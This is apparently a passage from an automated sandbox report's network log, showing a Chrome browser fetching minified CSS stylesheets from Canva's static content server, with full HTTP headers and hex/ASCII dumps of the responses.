                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 71 30 71 4b 76 39 77 74 74 47 44 73 79 65 25 32 46 37 76 53 37 61 38 31 4b 61 73 46 53 4c 4c 46 75 25 32 46 77 43 75 67 55 35 5a 73 39 4a 47 41 32 59 49 46 53 43 7a 25 32 42 77 44 43 79 68 4a 6b 69 48 30 61 35 31 62 59 77 32 69 42 4c 47 51 4c 5a 62 58 6b 78 31 66 68 62 6a 72 76 51 49 53 5a 48 70 55 4d 61 4a 65 58 77 49 57 55 55 46 37 78 6f 5a 62 58 73 62 71 74 5a 43 79 42 76 52 74 65 31 25 32 46 4e 25 32 46 39 6f 69 30 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0qKv9wttGDsye%2F7vS7a81KasFSLLFu%2FwCugU5Zs9JGA2YIFSCz%2BwDCyhJkiH0a51bYw2iBLGQLZbXkx1fhbjrvQISZHpUMaJeXwIWUUF7xoZbXsbqtZCyBvRte1%2FN%2F9oi0%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1202INData Raw: 2e 5f 32 43 66 69 62 77 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 6f 6c 66 72 33 51 29 3b 62 6f 74 74 6f 6d 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6c 65 66 74 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 5f 32 43 66 69 62 77 2e 55 65 35 51 46 41 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 5f 32 43 66 69 62 77 2e 53 43 75 33 4e 41 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 5f 32
                                                                                                                                                                                                                                                                    Data Ascii: ._2Cfibw{align-items:center;background-color:var(--olfr3Q);bottom:0;display:flex;justify-content:center;left:0;opacity:0;overflow-y:auto;position:fixed;right:0;top:0}._2Cfibw.Ue5QFA{transition:opacity .25s ease-in-out}._2Cfibw.SCu3NA{position:absolute}._2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1368INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 34 52 61 53 6a 67 29 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 4e 73 4e 65 58 51 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 55 52 6c 69 72 41 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 2d 34 30 70 78 3b 74 6f 70 3a 30 7d 2e 72 51 66 79 48 67 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 61 75 74 6f 7d 2e 6a 46 67 77 72 77 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 65 6a 36 70 42 67 29 3b 69 73 6f 6c 61 74 69 6f 6e 3a 69 73 6f 6c 61 74 65 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 36 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74
                                                                                                                                                                                                                                                                    Data Ascii: ackground-color:var(--4RaSjg);width:100%}.NsNeXQ{position:relative}.URlirA{position:absolute;right:-40px;top:0}.rQfyHg{pointer-events:auto}.jFgwrw{border-radius:16px;box-shadow:var(--ej6pBg);isolation:isolate;min-width:160px;overflow:hidden;position:relat


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    36192.168.2.1249756104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC806OUTGET /web/319bbcd1cecdb6ee.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1183INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:36 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 890
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950f598b50f9d-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 2480865
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "9a71130b0d652297e0a403e7e62d7f12"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:22 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 17 Oct 2024 00:31:23 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 18 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: hzr/2uKLp8nQSMxzVpH0xZ+1jrMuX1sAqPpkSL6FBxzM7ADIf5Kk3cpxGkgz4n/sAJqpFAy/gLQ=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: DW4PRRCJT941RSBC
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: fRYCJW5Fmwmo76WkclDGxqeHo_hACUtk
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC358INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 51 6b 4f 7a 54 7a 58 52 38 59 57 6e 67 45 47 51 5a 68 59 7a 53 6d 44 6a 77 6a 38 51 64 52 30 25 32 46 44 41 58 4c 70 56 4d 66 56 7a 71 53 77 38 7a 51 53 25 32 46 35 65 55 6e 74 75 72 37 30 36 53 74 55 25 32 46 25 32 42 6d 44 47 62 6c 52 64 4c 30 75 79 44 73 4e 25 32 42 70 45 51 30 25 32 46 44 44 54 6c 39 46 6a 55 34 30 4b 6c 70 4d 71 6e 61 7a 53 6c 4f 4e 58 72 7a 4a 74 58 6a 61 31 77 71 53 32 4b 78 35 6a 6d 71 79 25 32 46 70 6c 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QkOzTzXR8YWngEGQZhYzSmDjwj8QdR0%2FDAXLpVMfVzqSw8zQS%2F5eUntur706StU%2F%2BmDGblRdL0uyDsN%2BpEQ0%2FDDTl9FjU40KlpMqnazSlONXrzJtXja1wqS2Kx5jmqy%2FplQ%3D"}],"group":"cf-nel","max_age
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC890INData Raw: 2e 5a 50 38 48 76 51 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 53 7a 79 78 77 77 7b 6f 70 61 63 69 74 79 3a 31 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 43 71 50 4f 65 77 2c 2e 61 66 4d 53 6e 51 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 4a 52 6d 5f 50 51 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 53 7a 79 78 77 77 2c 2e 61 66 4d 53 6e 51 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 31 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 5f 32 74 72 6f 6c 67 20 2e 53 7a 79 78 77 77 2c 2e 5f 32 74 72 6f 6c 67 20 2e 61 66 4d 53 6e 51 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 34 2c 30 2c 2e 32 2c 31 29 7d
                                                                                                                                                                                                                                                                    Data Ascii: .ZP8HvQ{position:relative}.Szyxww{opacity:1;position:absolute;top:0;width:100%}.CqPOew,.afMSnQ{opacity:0}.JRm_PQ{opacity:1}.Szyxww,.afMSnQ{transition:opacity .1s ease-in-out}._2trolg .Szyxww,._2trolg .afMSnQ{transition:opacity .7s cubic-bezier(.4,0,.2,1)}


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    37192.168.2.1249757104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC806OUTGET /web/f2ae43eac10a5a36.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1182INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:36 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 1978
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950f5c945438d-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49976
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "c3ae5ac8dfaafde7a9683b6c61183974"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:22 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:24 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 3JjYFNz0eyVrrUuJGGCSnJVPdB8KdZsL245nUZ1eF/QlamSQICWYn2YsdM93b7ru+fEd601WQnI=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8GEFEBV66NA599
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: n6sLdIAJAt3X4cSav71t98V6UKUEHfnh
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 58 74 35 6c 66 6f 76 42 39 56 61 6f 4b 31 45 39 42 34 76 68 44 59 67 50 66 6d 4c 50 33 53 73 61 6b 58 68 58 66 54 52 6b 65 58 35 4d 47 67 4a 72 65 39 48 73 44 72 49 69 7a 76 68 74 4f 48 4e 4a 57 4c 68 4d 4e 77 43 55 6a 58 73 37 54 25 32 46 53 51 49 53 69 45 59 50 70 46 39 42 44 49 55 65 59 79 64 79 38 35 6e 25 32 46 45 74 56 58 54 32 47 70 6f 77 4a 6f 25 32 42 66 4d 30 6b 4f 45 70 4d 43 38 4b 68 5a 6a 4c 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xt5lfovB9VaoK1E9B4vhDYgPfmLP3SsakXhXfTRkeX5MGgJre9HsDrIizvhtOHNJWLhMNwCUjXs7T%2FSQISiEYPpF9BDIUeYydy85n%2FEtVXT2GpowJo%2BfM0kOEpMC8KhZjL4%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC1206INData Raw: 2e 6c 5f 50 5f 72 51 7b 64 69 73 70 6c 61 79 3a 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 6a 31 5a 76 67 77 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 6d 69 6e 6d 61 78 28 30 2c 31 66 72 29 20 6d 69 6e 6d 61 78 28 30 2c 31 66 72 29 7d 2e 66 5f 53 30 72 77 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 7d 2e 58 44 6e 32 30 77 7b 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 36 34 70 78 29 3b 6d 61 72 67 69 6e 3a 33 32 70 78 7d 2e 58 44 6e 32 30 77 2c 2e 6e 6a 52 65 67 51 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64
                                                                                                                                                                                                                                                                    Data Ascii: .l_P_rQ{display:grid;height:100%}.j1Zvgw{grid-template-columns:minmax(0,1fr) minmax(0,1fr)}.f_S0rw{overflow-x:hidden;overflow-y:auto;-webkit-user-select:text;user-select:text}.XDn20w{height:calc(100% - 64px);margin:32px}.XDn20w,.njRegQ{display:flex;flex-d
                                                                                                                                                                                                                                                                    2024-11-20 15:01:36 UTC772INData Raw: 73 74 2d 63 68 69 6c 64 3e 2e 6d 49 4a 5a 69 77 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 53 58 32 46 42 67 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 7d 2e 74 76 39 55 6e 67 20 2e 61 36 5a 4a 55 77 20 2e 41 5f 48 35 55 41 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 32 70 78 7d 2e 46 63 51 39 65 51 7b 68 65 69 67 68 74 3a 2d 77 65 62 6b 69 74 2d 66 69 74 2d 63 6f 6e 74 65 6e 74 3b 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 66 69 74 2d 63 6f 6e 74 65 6e 74 3b 68 65 69 67 68 74 3a 66 69 74 2d 63 6f 6e 74 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 46 63 51 39 65 51 20 2e 4e 54 79 6a 68 41 7b
                                                                                                                                                                                                                                                                    Data Ascii: st-child>.mIJZiw{display:none}.SX2FBg{align-items:center;display:flex;min-height:32px;padding:0 16px}.tv9Ung .a6ZJUw .A_H5UA{padding-left:32px}.FcQ9eQ{height:-webkit-fit-content;height:-moz-fit-content;height:fit-content;position:relative}.FcQ9eQ .NTyjhA{


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    38192.168.2.1249761104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC806OUTGET /web/111dc8963cac940b.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1181INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:37 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 84
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950fe3dccde95-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 975441
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "b3372b8d38ee3335fdc263c0b44ad4c6"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:23 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 09 Oct 2024 00:42:29 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 10 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: M9kbGB6h7Pu6/Nn5LeCvU8nSS09I06rdFNaJCXtwdRWINvKRpNVZua/B9IWy+7+sk/7qBx+SHDk=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 086BJ3MAK65KVGD5
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: skhhdzlCIrwaC8xbguAbIJqtQwRk40sG
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC346INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 55 76 44 70 46 6b 72 75 6e 52 79 47 4b 5a 30 7a 48 66 50 4f 6a 6c 74 69 6e 64 4b 42 37 71 52 32 7a 73 68 59 6a 37 44 65 76 54 75 25 32 46 35 65 47 48 30 6a 4a 76 4f 69 76 66 64 56 6a 49 35 38 43 6b 46 4c 70 4a 6d 6a 71 50 46 6f 56 53 45 4f 47 36 5a 6d 46 52 6f 43 79 70 35 57 75 44 53 53 5a 65 41 59 49 6e 78 68 30 68 35 33 51 31 38 4f 38 30 71 56 78 58 78 49 62 6d 66 78 73 6f 78 6d 50 46 6d 48 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UvDpFkrunRyGKZ0zHfPOjltindKB7qR2zshYj7DevTu%2F5eGH0jJvOivfdVjI58CkFLpJmjqPFoVSEOG6ZmFRoCyp5WuDSSZeAYInxh0h53Q18O80qVxXxIbmfxsoxmPFmHQ%3D"}],"group":"cf-nel","max_age":604800}N
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC84INData Raw: 2e 43 7a 72 5a 63 51 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 0a 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 75 72 63 65 6d 61 70 73 2f 31 31 31 64 63 38 39 36 33 63 61 63 39 34 30 62 2e 6c 74 72 2e 63 73 73 2e 6d 61 70 2a 2f
                                                                                                                                                                                                                                                                    Data Ascii: .CzrZcQ{display:none}/*# sourceMappingURL=sourcemaps/111dc8963cac940b.ltr.css.map*/


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    39192.168.2.1249760104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC806OUTGET /web/b3153e94a5482d0b.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1183INHTTP/1.1 200 OK
